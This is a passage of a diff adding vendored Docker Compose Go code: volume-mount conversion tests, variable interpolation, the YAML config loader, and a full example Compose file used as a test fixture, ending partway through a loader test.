stackVolumes := volumes{ + "normal": composetypes.VolumeConfig{ + Driver: "glusterfs", + DriverOpts: map[string]string{ + "opt": "value", + }, + Labels: map[string]string{ + "something": "labeled", + }, + }, + } + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeVolume, + Source: "foo_normal", + Target: "/foo", + ReadOnly: true, + VolumeOptions: &mount.VolumeOptions{ + Labels: map[string]string{ + LabelNamespace: "foo", + "something": "labeled", + }, + DriverConfig: &mount.Driver{ + Name: "glusterfs", + Options: map[string]string{ + "opt": "value", + }, + }, + }, + } + mount, err := convertVolumeToMount("normal:/foo:ro", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mount, expected) +} + +func TestConvertVolumeToMountNamedVolumeExternal(t *testing.T) { + stackVolumes := volumes{ + "outside": composetypes.VolumeConfig{ + External: composetypes.External{ + External: true, + Name: "special", + }, + }, + } + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeVolume, + Source: "special", + Target: "/foo", + } + mount, err := convertVolumeToMount("outside:/foo", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mount, expected) +} + +func TestConvertVolumeToMountBind(t *testing.T) { + stackVolumes := volumes{} + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeBind, + Source: "/bar", + Target: "/foo", + ReadOnly: true, + BindOptions: &mount.BindOptions{Propagation: mount.PropagationShared}, + } + mount, err := convertVolumeToMount("/bar:/foo:ro,shared", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mount, expected) +} + +func TestConvertVolumeToMountVolumeDoesNotExist(t *testing.T) { + namespace := NewNamespace("foo") + _, err := convertVolumeToMount("unknown:/foo:ro", volumes{}, namespace) + assert.Error(t, err, "undefined volume: unknown") +} + +func TestConvertVolumeToMountAnonymousVolume(t *testing.T) { + stackVolumes := map[string]composetypes.VolumeConfig{} + namespace := NewNamespace("foo") + expected := mount.Mount{ + Type: mount.TypeVolume, + Target: "/foo/bar", + } + mnt, err := convertVolumeToMount("/foo/bar", stackVolumes, namespace) + assert.NilError(t, err) + assert.DeepEqual(t, mnt, expected) +} + +func TestConvertVolumeToMountInvalidFormat(t *testing.T) { + namespace := NewNamespace("foo") + invalids := []string{"::", "::cc", ":bb:", "aa::", "aa::cc", "aa:bb:", " : : ", " : :cc", " :bb: ", "aa: : ", "aa: :cc", "aa:bb: "} + for _, vol := range invalids { + _, err := convertVolumeToMount(vol, map[string]composetypes.VolumeConfig{}, namespace) + assert.Error(t, err, "invalid volume: "+vol) + } +} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go new file mode 100644 index 0000000000..734f28ec9d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go @@ -0,0 +1,90 @@ +package interpolation + +import ( + "fmt" + + "github.com/docker/docker/cli/compose/template" + "github.com/docker/docker/cli/compose/types" +) + +// Interpolate replaces variables in a string with the values from a mapping +func Interpolate(config types.Dict, section string, mapping template.Mapping) (types.Dict, error) { + out := types.Dict{} + + for name, item := range config { + if item == nil { + out[name] = nil + continue + } + interpolatedItem, err := interpolateSectionItem(name, item.(types.Dict), section, mapping) + if err != nil { + return nil, err + } + out[name] = interpolatedItem + } + + return out, nil +} + +func interpolateSectionItem( + name string, + item types.Dict, + section string, + mapping template.Mapping, +) (types.Dict, error) { + + out := types.Dict{} + + for key, value := range item { + interpolatedValue, err := recursiveInterpolate(value, mapping) + if err != nil { + return nil, fmt.Errorf( + "Invalid interpolation format for %#v option in %s %#v: %#v", + key, section, name, err.Template, + ) + } + out[key] = interpolatedValue + } + + return out, nil + +} + +func recursiveInterpolate( + value interface{}, + mapping template.Mapping, +) (interface{}, *template.InvalidTemplateError) { + + switch value := value.(type) { + + case string: + return template.Substitute(value, mapping) + + case types.Dict: + out := types.Dict{} + for key, elem := range value { + interpolatedElem, err := recursiveInterpolate(elem, mapping) + if err != nil { + return nil, err + } + out[key] = interpolatedElem + } + return out, nil + + case []interface{}: + out := make([]interface{}, len(value)) + for i, elem := range value { + interpolatedElem, err := recursiveInterpolate(elem, mapping) + if err != nil { + return nil, err + } + out[i] = interpolatedElem + } + return out, nil + + default: + return value, nil + + } + +} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go new file mode 100644 index 0000000000..c3921701b3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go @@ -0,0 +1,59 @@ +package interpolation + +import ( + "testing" + + "github.com/stretchr/testify/assert" + + "github.com/docker/docker/cli/compose/types" +) + +var defaults = map[string]string{ + "USER": "jenny", + "FOO": "bar", +} + +func defaultMapping(name string) (string, bool) { + val, ok := defaults[name] + return val, ok +} + +func TestInterpolate(t *testing.T) { + services := types.Dict{ + "servicea": types.Dict{ + "image": "example:${USER}", + "volumes": []interface{}{"$FOO:/target"}, + "logging": types.Dict{ + "driver": "${FOO}", + "options": types.Dict{ + "user": "$USER", + }, + }, + }, + } + expected := types.Dict{ + "servicea": types.Dict{ + "image": "example:jenny", + "volumes": []interface{}{"bar:/target"}, + "logging": types.Dict{ + "driver": "bar", + "options": types.Dict{ + "user": "jenny", + }, + }, + }, + } + result, err := Interpolate(services, "service", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, expected, result) +} + +func TestInvalidInterpolation(t *testing.T) { + services := types.Dict{ + "servicea": types.Dict{ + "image": "${", + }, + } + _, err := Interpolate(services, "service", defaultMapping) + assert.EqualError(t, err, `Invalid interpolation format for "image" option in service "servicea": "${"`) +} diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example1.env b/vendor/github.com/docker/docker/cli/compose/loader/example1.env new file mode 100644 index 0000000000..3e7a059613 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/example1.env @@ -0,0 +1,8 @@ +# passed through +FOO=1 + +# overridden in example2.env +BAR=1 + +# overridden in full-example.yml +BAZ=1 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example2.env b/vendor/github.com/docker/docker/cli/compose/loader/example2.env new file mode 100644 index 0000000000..0920d5ab05 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/example2.env @@ -0,0 +1 @@ +BAR=2 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml new file mode 100644 index 0000000000..fb5686a380 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml @@ -0,0 +1,287 @@ +version: "3" + +services: + foo: + cap_add: + - ALL + + cap_drop: + - NET_ADMIN + - SYS_ADMIN + + cgroup_parent: m-executor-abcd + + # String or list + command: bundle exec thin -p 3000 + # command: ["bundle", "exec", "thin", "-p", "3000"] + + container_name: my-web-container + + depends_on: + - db + - redis + + deploy: + mode: replicated + replicas: 6 + labels: [FOO=BAR] + update_config: + parallelism: 3 + delay: 10s + failure_action: continue + monitor: 60s + max_failure_ratio: 0.3 + resources: + limits: + cpus: '0.001' + memory: 50M + reservations: + cpus: '0.0001' + memory: 20M + restart_policy: + condition: on_failure + delay: 5s + max_attempts: 3 + window: 120s + placement: + constraints: [node=foo] + + devices: + - "/dev/ttyUSB0:/dev/ttyUSB0" + + # String or list + # dns: 8.8.8.8 + dns: + - 8.8.8.8 + - 9.9.9.9 + + # String or list + # dns_search: example.com + dns_search: + - dc1.example.com + - dc2.example.com + + domainname: foo.com + + # String or list + # entrypoint: /code/entrypoint.sh -p 3000 + entrypoint: ["/code/entrypoint.sh", "-p", "3000"] + + # String or list + # env_file: .env + env_file: + - ./example1.env + - ./example2.env + + # Mapping or list + # Mapping values can be strings, numbers or null + # Booleans are not allowed - must be quoted + environment: + RACK_ENV: development + SHOW: 'true' + SESSION_SECRET: + BAZ: 3 + # environment: + # - RACK_ENV=development + # - SHOW=true + # - SESSION_SECRET + + # Items can be strings or numbers + expose: + - "3000" + - 8000 + + external_links: + - redis_1 + - project_db_1:mysql + - project_db_1:postgresql + + # Mapping or list + # Mapping values must be strings + # extra_hosts: + # somehost: "162.242.195.82" + # otherhost: "50.31.209.229" + extra_hosts: + - "somehost:162.242.195.82" + - "otherhost:50.31.209.229" + + hostname: foo + + healthcheck: + test: echo "hello world" + interval: 10s + timeout: 1s + retries: 5 + + # Any valid image reference - repo, tag, id, sha + image: redis + # image: ubuntu:14.04 + # image: tutum/influxdb + # image: example-registry.com:4000/postgresql + # image: a4bc65fd + # image: busybox@sha256:38a203e1986cf79639cfb9b2e1d6e773de84002feea2d4eb006b52004ee8502d + + ipc: host + + # Mapping or list + # Mapping values can be strings, numbers or null + labels: + com.example.description: "Accounting webapp" + com.example.number: 42 + com.example.empty-label: + # labels: + # - "com.example.description=Accounting webapp" + # - "com.example.number=42" + # - "com.example.empty-label" + + links: + - db + - db:database + - redis + + logging: + driver: syslog + options: + syslog-address: "tcp://192.168.0.42:123" + + mac_address: 02:42:ac:11:65:43 + + # network_mode: "bridge" + # network_mode: "host" + # network_mode: "none" + # Use the network mode of an arbitrary container from another service + # network_mode: "service:db" + # Use the network mode of another container, specified by name or id + # network_mode: "container:some-container" + network_mode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b" + + networks: + some-network: + aliases: + - alias1 + - alias3 + other-network: + ipv4_address: 172.16.238.10 + ipv6_address: 2001:3984:3989::10 + other-other-network: + + pid: "host" + + ports: + - 3000 + - "3000-3005" + - "8000:8000" + - "9090-9091:8080-8081" + - "49100:22" + - "127.0.0.1:8001:8001" + - "127.0.0.1:5000-5010:5000-5010" + + privileged: true + + read_only: true + + restart: always + + security_opt: + - label=level:s0:c100,c200 + - label=type:svirt_apache_t + + stdin_open: true + + stop_grace_period: 20s + + stop_signal: SIGUSR1 + + # String or list + # tmpfs: /run + tmpfs: + - /run + - /tmp + + tty: true + + ulimits: + # Single number or mapping with soft + hard limits + nproc: 65535 + nofile: + soft: 20000 + hard: 40000 + + user: someone + + volumes: + # Just specify a path and let the Engine create a volume + - /var/lib/mysql + # Specify an absolute path mapping + - /opt/data:/var/lib/mysql + # Path on the host, relative to the Compose file + - .:/code + - ./static:/var/www/html + # User-relative path + - ~/configs:/etc/configs/:ro + # Named volume + - datavolume:/var/lib/mysql + + working_dir: /code + +networks: + # Entries can be null, which specifies simply that a network + # called "{project name}_some-network" should be created and + # use the default driver + some-network: + + other-network: + driver: overlay + + driver_opts: + # Values can be strings or numbers + foo: "bar" + baz: 1 + + ipam: + driver: overlay + # driver_opts: + # # Values can be strings or numbers + # com.docker.network.enable_ipv6: "true" + # com.docker.network.numeric_value: 1 + config: + - subnet: 172.16.238.0/24 + # gateway: 172.16.238.1 + - subnet: 2001:3984:3989::/64 + # gateway: 2001:3984:3989::1 + + external-network: + # Specifies that a pre-existing network called "external-network" + # can be referred to within this file as "external-network" + external: true + + other-external-network: + # Specifies that a pre-existing network called "my-cool-network" + # can be referred to within this file as "other-external-network" + external: + name: my-cool-network + +volumes: + # Entries can be null, which specifies simply that a volume + # called "{project name}_some-volume" should be created and + # use the default driver + some-volume: + + other-volume: + driver: flocker + + driver_opts: + # Values can be strings or numbers + foo: "bar" + baz: 1 + + external-volume: + # Specifies that a pre-existing volume called "external-volume" + # can be referred to within this file as "external-volume" + external: true + + other-external-volume: + # Specifies that a pre-existing volume called "my-cool-volume" + # can be referred to within this file as "other-external-volume" + external: + name: my-cool-volume diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader.go b/vendor/github.com/docker/docker/cli/compose/loader/loader.go new file mode 100644 index 0000000000..39f69a03ff --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/loader.go @@ -0,0 +1,653 @@ +package loader + +import ( + "fmt" + "os" + "path" + "reflect" + "regexp" + "sort" + "strings" + + "github.com/docker/docker/cli/compose/interpolation" + "github.com/docker/docker/cli/compose/schema" + "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/runconfig/opts" + units "github.com/docker/go-units" + shellwords "github.com/mattn/go-shellwords" + "github.com/mitchellh/mapstructure" + yaml "gopkg.in/yaml.v2" +) + +var ( + fieldNameRegexp = regexp.MustCompile("[A-Z][a-z0-9]+") +) + +// ParseYAML reads the bytes from a file, parses the bytes into a mapping +// structure, and returns it. +func ParseYAML(source []byte) (types.Dict, error) { + var cfg interface{} + if err := yaml.Unmarshal(source, &cfg); err != nil { + return nil, err + } + cfgMap, ok := cfg.(map[interface{}]interface{}) + if !ok { + return nil, fmt.Errorf("Top-level object must be a mapping") + } + converted, err := convertToStringKeysRecursive(cfgMap, "") + if err != nil { + return nil, err + } + return converted.(types.Dict), nil +} + +// Load reads a ConfigDetails and returns a fully loaded configuration +func Load(configDetails types.ConfigDetails) (*types.Config, error) { + if len(configDetails.ConfigFiles) < 1 { + return nil, fmt.Errorf("No files specified") + } + if len(configDetails.ConfigFiles) > 1 { + return nil, fmt.Errorf("Multiple files are not yet supported") + } + + configDict := getConfigDict(configDetails) + + if services, ok := configDict["services"]; ok { + if servicesDict, ok := services.(types.Dict); ok { + forbidden := getProperties(servicesDict, types.ForbiddenProperties) + + if len(forbidden) > 0 { + return nil, &ForbiddenPropertiesError{Properties: forbidden} + } + } + } + + if err := schema.Validate(configDict, schema.Version(configDict)); err != nil { + return nil, err + } + + cfg := types.Config{} + if services, ok := configDict["services"]; ok { + servicesConfig, err := interpolation.Interpolate(services.(types.Dict), "service", os.LookupEnv) + if err != nil { + return nil, err + } + + servicesList, err := loadServices(servicesConfig, configDetails.WorkingDir) + if err != nil { + return nil, err + } + + cfg.Services = servicesList + } + + if networks, ok := configDict["networks"]; ok { + networksConfig, err := interpolation.Interpolate(networks.(types.Dict), "network", os.LookupEnv) + if err != nil { + return nil, err + } + + networksMapping, err := loadNetworks(networksConfig) + if err != nil { + return nil, err + } + + cfg.Networks = networksMapping + } + + if volumes, ok := configDict["volumes"]; ok { + volumesConfig, err := interpolation.Interpolate(volumes.(types.Dict), "volume", os.LookupEnv) + if err != nil { + return nil, err + } + + volumesMapping, err := loadVolumes(volumesConfig) + if err != nil { + return nil, err + } + + cfg.Volumes = volumesMapping + } + + if secrets, ok := configDict["secrets"]; ok { + secretsConfig, err := interpolation.Interpolate(secrets.(types.Dict), "secret", os.LookupEnv) + if err != nil { + return nil, err + } + + secretsMapping, err := loadSecrets(secretsConfig, configDetails.WorkingDir) + if err != nil { + return nil, err + } + + cfg.Secrets = secretsMapping + } + + return &cfg, nil +} + +// GetUnsupportedProperties returns the list of any unsupported properties that are +// used in the Compose files. +func GetUnsupportedProperties(configDetails types.ConfigDetails) []string { + unsupported := map[string]bool{} + + for _, service := range getServices(getConfigDict(configDetails)) { + serviceDict := service.(types.Dict) + for _, property := range types.UnsupportedProperties { + if _, isSet := serviceDict[property]; isSet { + unsupported[property] = true + } + } + } + + return sortedKeys(unsupported) +} + +func sortedKeys(set map[string]bool) []string { + var keys []string + for key := range set { + keys = append(keys, key) + } + sort.Strings(keys) + return keys +} + +// GetDeprecatedProperties returns the list of any deprecated properties that +// are used in the compose files. +func GetDeprecatedProperties(configDetails types.ConfigDetails) map[string]string { + return getProperties(getServices(getConfigDict(configDetails)), types.DeprecatedProperties) +} + +func getProperties(services types.Dict, propertyMap map[string]string) map[string]string { + output := map[string]string{} + + for _, service := range services { + if serviceDict, ok := service.(types.Dict); ok { + for property, description := range propertyMap { + if _, isSet := serviceDict[property]; isSet { + output[property] = description + } + } + } + } + + return output +} + +// ForbiddenPropertiesError is returned when there are properties in the Compose +// file that are forbidden. +type ForbiddenPropertiesError struct { + Properties map[string]string +} + +func (e *ForbiddenPropertiesError) Error() string { + return "Configuration contains forbidden properties" +} + +// TODO: resolve multiple files into a single config +func getConfigDict(configDetails types.ConfigDetails) types.Dict { + return configDetails.ConfigFiles[0].Config +} + +func getServices(configDict types.Dict) types.Dict { + if services, ok := configDict["services"]; ok { + if servicesDict, ok := services.(types.Dict); ok { + return servicesDict + } + } + + return types.Dict{} +} + +func transform(source map[string]interface{}, target interface{}) error { + data := mapstructure.Metadata{} + config := &mapstructure.DecoderConfig{ + DecodeHook: mapstructure.ComposeDecodeHookFunc( + transformHook, + mapstructure.StringToTimeDurationHookFunc()), + Result: target, + Metadata: &data, + } + decoder, err := mapstructure.NewDecoder(config) + if err != nil { + return err + } + err = decoder.Decode(source) + // TODO: log unused keys + return err +} + +func transformHook( + source reflect.Type, + target reflect.Type, + data interface{}, +) (interface{}, error) { + switch target { + case reflect.TypeOf(types.External{}): + return transformExternal(data) + case reflect.TypeOf(make(map[string]string, 0)): + return transformMapStringString(source, target, data) + case reflect.TypeOf(types.UlimitsConfig{}): + return transformUlimits(data) + case reflect.TypeOf(types.UnitBytes(0)): + return loadSize(data) + case reflect.TypeOf(types.ServiceSecretConfig{}): + return transformServiceSecret(data) + } + switch target.Kind() { + case reflect.Struct: + return transformStruct(source, target, data) + } + return data, nil +} + +// keys needs to be converted to strings for jsonschema +// TODO: don't use types.Dict +func convertToStringKeysRecursive(value interface{}, keyPrefix string) (interface{}, error) { + if mapping, ok := value.(map[interface{}]interface{}); ok { + dict := make(types.Dict) + for key, entry := range mapping { + str, ok := key.(string) + if !ok { + var location string + if keyPrefix == "" { + location = "at top level" + } else { + location = fmt.Sprintf("in %s", keyPrefix) + } + return nil, fmt.Errorf("Non-string key %s: %#v", location, key) + } + var newKeyPrefix string + if keyPrefix == "" { + newKeyPrefix = str + } else { + newKeyPrefix = fmt.Sprintf("%s.%s", keyPrefix, str) + } + convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) + if err != nil { + return nil, err + } + dict[str] = convertedEntry + } + return dict, nil + } + if list, ok := value.([]interface{}); ok { + var convertedList []interface{} + for index, entry := range list { + newKeyPrefix := fmt.Sprintf("%s[%d]", keyPrefix, index) + convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) + if err != nil { + return nil, err + } + convertedList = append(convertedList, convertedEntry) + } + return convertedList, nil + } + return value, nil +} + +func loadServices(servicesDict types.Dict, workingDir string) ([]types.ServiceConfig, error) { + var services []types.ServiceConfig + + for name, serviceDef := range servicesDict { + serviceConfig, err := loadService(name, serviceDef.(types.Dict), workingDir) + if err != nil { + return nil, err + } + services = append(services, *serviceConfig) + } + + return services, nil +} + +func loadService(name string, serviceDict types.Dict, workingDir string) (*types.ServiceConfig, error) { + serviceConfig := &types.ServiceConfig{} + if err := transform(serviceDict, serviceConfig); err != nil { + return nil, err + } + serviceConfig.Name = name + + if err := resolveEnvironment(serviceConfig, serviceDict, workingDir); err != nil { + return nil, err + } + + if err := resolveVolumePaths(serviceConfig.Volumes, workingDir); err != nil { + return nil, err + } + + return serviceConfig, nil +} + +func resolveEnvironment(serviceConfig *types.ServiceConfig, serviceDict types.Dict, workingDir string) error { + environment := make(map[string]string) + + if envFileVal, ok := serviceDict["env_file"]; ok { + envFiles := loadStringOrListOfStrings(envFileVal) + + var envVars []string + + for _, file := range envFiles { + filePath := absPath(workingDir, file) + fileVars, err := opts.ParseEnvFile(filePath) + if err != nil { + return err + } + envVars = append(envVars, fileVars...) + } + + for k, v := range opts.ConvertKVStringsToMap(envVars) { + environment[k] = v + } + } + + for k, v := range serviceConfig.Environment { + environment[k] = v + } + + serviceConfig.Environment = environment + + return nil +} + +func resolveVolumePaths(volumes []string, workingDir string) error { + for i, mapping := range volumes { + parts := strings.SplitN(mapping, ":", 2) + if len(parts) == 1 { + continue + } + + if strings.HasPrefix(parts[0], ".") { + parts[0] = absPath(workingDir, parts[0]) + } + parts[0] = expandUser(parts[0]) + + volumes[i] = strings.Join(parts, ":") + } + + return nil +} + +// TODO: make this more robust +func expandUser(path string) string { + if strings.HasPrefix(path, "~") { + return strings.Replace(path, "~", os.Getenv("HOME"), 1) + } + return path +} + +func transformUlimits(data interface{}) (interface{}, error) { + switch value := data.(type) { + case int: + return types.UlimitsConfig{Single: value}, nil + case types.Dict: + ulimit := types.UlimitsConfig{} + ulimit.Soft = value["soft"].(int) + ulimit.Hard = value["hard"].(int) + return ulimit, nil + default: + return data, fmt.Errorf("invalid type %T for ulimits", value) + } +} + +func loadNetworks(source types.Dict) (map[string]types.NetworkConfig, error) { + networks := make(map[string]types.NetworkConfig) + err := transform(source, &networks) + if err != nil { + return networks, err + } + for name, network := range networks { + if network.External.External && network.External.Name == "" { + network.External.Name = name + networks[name] = network + } + } + return networks, nil +} + +func loadVolumes(source types.Dict) (map[string]types.VolumeConfig, error) { + volumes := make(map[string]types.VolumeConfig) + err := transform(source, &volumes) + if err != nil { + return volumes, err + } + for name, volume := range volumes { + if volume.External.External && volume.External.Name == "" { + volume.External.Name = name + volumes[name] = volume + } + } + return volumes, nil +} + +// TODO: remove duplicate with networks/volumes +func loadSecrets(source types.Dict, workingDir string) (map[string]types.SecretConfig, error) { + secrets := make(map[string]types.SecretConfig) + if err := transform(source, &secrets); err != nil { + return secrets, err + } + for name, secret := range secrets { + if secret.External.External && secret.External.Name == "" { + secret.External.Name = name + secrets[name] = secret + } + if secret.File != "" { + secret.File = absPath(workingDir, secret.File) + } + } + return secrets, nil +} + +func absPath(workingDir string, filepath string) string { + if path.IsAbs(filepath) { + return filepath + } + return path.Join(workingDir, filepath) +} + +func transformStruct( + source reflect.Type, + target reflect.Type, + data interface{}, +) (interface{}, error) { + structValue, ok := data.(map[string]interface{}) + if !ok { + // FIXME: this is necessary because of convertToStringKeysRecursive + structValue, ok = data.(types.Dict) + if !ok { + panic(fmt.Sprintf( + "transformStruct called with non-map type: %T, %s", data, data)) + } + } + + var err error + for i := 0; i < target.NumField(); i++ { + field := target.Field(i) + fieldTag := field.Tag.Get("compose") + + yamlName := toYAMLName(field.Name) + value, ok := structValue[yamlName] + if !ok { + continue + } + + structValue[yamlName], err = convertField( + fieldTag, reflect.TypeOf(value), field.Type, value) + if err != nil { + return nil, fmt.Errorf("field %s: %s", yamlName, err.Error()) + } + } + return structValue, nil +} + +func transformMapStringString( + source reflect.Type, + target reflect.Type, + data interface{}, +) (interface{}, error) { + switch value := data.(type) { + case map[string]interface{}: + return toMapStringString(value), nil + case types.Dict: + return toMapStringString(value), nil + case map[string]string: + return value, nil + default: + return data, fmt.Errorf("invalid type %T for map[string]string", value) + } +} + +func convertField( + fieldTag string, + source reflect.Type, + target reflect.Type, + data interface{}, +) (interface{}, error) { + switch fieldTag { + case "": + return data, nil + case "healthcheck": + return loadHealthcheck(data) + case "list_or_dict_equals": + return loadMappingOrList(data, "="), nil + case "list_or_dict_colon": + return loadMappingOrList(data, ":"), nil + case "list_or_struct_map": + return loadListOrStructMap(data, target) + case "string_or_list": + return loadStringOrListOfStrings(data), nil + case "list_of_strings_or_numbers": + return loadListOfStringsOrNumbers(data), nil + case "shell_command": + return loadShellCommand(data) + case "size": + return loadSize(data) + case "-": + return nil, nil + } + return data, nil +} + +func transformExternal(data interface{}) (interface{}, error) { + switch value := data.(type) { + case bool: + return map[string]interface{}{"external": value}, nil + case types.Dict: + return map[string]interface{}{"external": true, "name": value["name"]}, nil + case map[string]interface{}: + return map[string]interface{}{"external": true, "name": value["name"]}, nil + default: + return data, fmt.Errorf("invalid type %T for external", value) + } +} + +func transformServiceSecret(data interface{}) (interface{}, error) { + switch value := data.(type) { + case string: + return map[string]interface{}{"source": value}, nil + case types.Dict: + return data, nil + case map[string]interface{}: + return data, nil + default: + return data, fmt.Errorf("invalid type %T for external", value) + } + +} + +func toYAMLName(name string) string { + nameParts := fieldNameRegexp.FindAllString(name, -1) + for i, p := range nameParts { + nameParts[i] = strings.ToLower(p) + } + return strings.Join(nameParts, "_") +} + +func loadListOrStructMap(value interface{}, target reflect.Type) (interface{}, error) { + if list, ok := value.([]interface{}); ok { + mapValue := map[interface{}]interface{}{} + for _, name := range list { + mapValue[name] = nil + } + return mapValue, nil + } + + return value, nil +} + +func loadListOfStringsOrNumbers(value interface{}) []string { + list := value.([]interface{}) + result := make([]string, len(list)) + for i, item := range list { + result[i] = fmt.Sprint(item) + } + return result +} + +func loadStringOrListOfStrings(value interface{}) []string { + if list, ok := value.([]interface{}); ok { + result := make([]string, len(list)) + for i, item := range list { + result[i] = fmt.Sprint(item) + } + return result + } + return []string{value.(string)} +} + +func loadMappingOrList(mappingOrList interface{}, sep string) map[string]string { + if mapping, ok := mappingOrList.(types.Dict); ok { + return toMapStringString(mapping) + } + if list, ok := mappingOrList.([]interface{}); ok { + result := make(map[string]string) + for _, value := range list { + parts := strings.SplitN(value.(string), sep, 2) + if len(parts) == 1 { + result[parts[0]] = "" + } else { + result[parts[0]] = parts[1] + } + } + return result + } + panic(fmt.Errorf("expected a map or a slice, got: %#v", mappingOrList)) +} + +func loadShellCommand(value interface{}) (interface{}, error) { + if str, ok := value.(string); ok { + return shellwords.Parse(str) + } + return value, nil +} + +func loadHealthcheck(value interface{}) (interface{}, error) { + if str, ok := value.(string); ok { + return append([]string{"CMD-SHELL"}, str), nil + } + return value, nil +} + +func loadSize(value interface{}) (int64, error) { + switch value := value.(type) { + case int: + return int64(value), nil + case string: + return units.RAMInBytes(value) + } + panic(fmt.Errorf("invalid type for size %T", value)) +} + +func toMapStringString(value map[string]interface{}) map[string]string { + output := make(map[string]string) + for key, value := range value { + output[key] = toString(value) + } + return output +} + +func toString(value interface{}) string { + if value == nil { + return "" + } + return fmt.Sprint(value) +} diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go new file mode 100644 index 0000000000..f7fee89ede --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go @@ -0,0 +1,800 @@ +package loader + +import ( + "fmt" + "io/ioutil" + "os" + "sort" + "testing" + "time" + + "github.com/docker/docker/cli/compose/types" + "github.com/stretchr/testify/assert" +) + +func buildConfigDetails(source types.Dict) types.ConfigDetails { + workingDir, err := os.Getwd() + if err != nil { + panic(err) + } + + return types.ConfigDetails{ + WorkingDir: workingDir, + ConfigFiles: []types.ConfigFile{ + {Filename: "filename.yml", Config: source}, + }, + Environment: nil, + } +} + +var sampleYAML = ` +version: "3" +services: + foo: + image: busybox + networks: + with_me: + bar: + image: busybox + environment: + - FOO=1 + networks: + - with_ipam +volumes: + hello: + driver: default + driver_opts: + beep: boop +networks: + default: + driver: bridge + driver_opts: + beep: boop + with_ipam: + ipam: + driver: default + config: + - subnet: 172.28.0.0/16 +` + +var sampleDict = types.Dict{ + "version": "3", + "services": types.Dict{ + "foo": types.Dict{ + "image": "busybox", + "networks": types.Dict{"with_me": nil}, + }, + "bar": types.Dict{ + "image": "busybox", + "environment": []interface{}{"FOO=1"}, + "networks": []interface{}{"with_ipam"}, + }, + }, + "volumes": types.Dict{ + "hello": types.Dict{ + "driver": "default", + "driver_opts": types.Dict{ + "beep": "boop", + }, + }, + }, + "networks": types.Dict{ + "default": types.Dict{ + "driver": "bridge", + "driver_opts": types.Dict{ + "beep": "boop", + }, + }, + "with_ipam": types.Dict{ + "ipam": types.Dict{ + "driver": "default", + "config": []interface{}{ + types.Dict{ + "subnet": "172.28.0.0/16", + }, + }, + }, + }, + }, +} + +var sampleConfig = types.Config{ + Services: []types.ServiceConfig{ + { + Name: "foo", + Image: "busybox", + Environment: map[string]string{}, + Networks: map[string]*types.ServiceNetworkConfig{ + "with_me": nil, + }, + }, + { + Name: "bar", + Image: "busybox", + Environment: map[string]string{"FOO": "1"}, + Networks: map[string]*types.ServiceNetworkConfig{ + "with_ipam": nil, + }, + }, + }, + Networks: map[string]types.NetworkConfig{ + "default": { + Driver: "bridge", + DriverOpts: map[string]string{ + "beep": "boop", + }, + }, + "with_ipam": { + Ipam: types.IPAMConfig{ + Driver: "default", + Config: []*types.IPAMPool{ + { + Subnet: "172.28.0.0/16", + }, + }, + }, + }, + }, + Volumes: map[string]types.VolumeConfig{ + "hello": { + Driver: "default", + DriverOpts: map[string]string{ + "beep": "boop", + }, + }, + }, +} + +func TestParseYAML(t *testing.T) { + dict, err := ParseYAML([]byte(sampleYAML)) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, sampleDict, dict) +} + +func TestLoad(t *testing.T) { + actual, err := Load(buildConfigDetails(sampleDict)) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) + assert.Equal(t, sampleConfig.Networks, actual.Networks) + assert.Equal(t, sampleConfig.Volumes, actual.Volumes) +} + +func TestLoadV31(t *testing.T) { + actual, err := loadYAML(` +version: "3.1" +services: + foo: + image: busybox + secrets: [super] +secrets: + super: + external: true +`) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, len(actual.Services), 1) + assert.Equal(t, len(actual.Secrets), 1) +} + +func TestParseAndLoad(t *testing.T) { + actual, err := loadYAML(sampleYAML) + if !assert.NoError(t, err) { + return + } + assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) + assert.Equal(t, sampleConfig.Networks, actual.Networks) + assert.Equal(t, sampleConfig.Volumes, actual.Volumes) +} + +func TestInvalidTopLevelObjectType(t *testing.T) { + _, err := loadYAML("1") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Top-level object must be a mapping") + + _, err = loadYAML("\"hello\"") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Top-level object must be a mapping") + + _, err = loadYAML("[\"hello\"]") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Top-level object must be a mapping") +} + +func TestNonStringKeys(t *testing.T) { + _, err := loadYAML(` +version: "3" +123: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key at top level: 123") + + _, err = loadYAML(` +version: "3" +services: + foo: + image: busybox 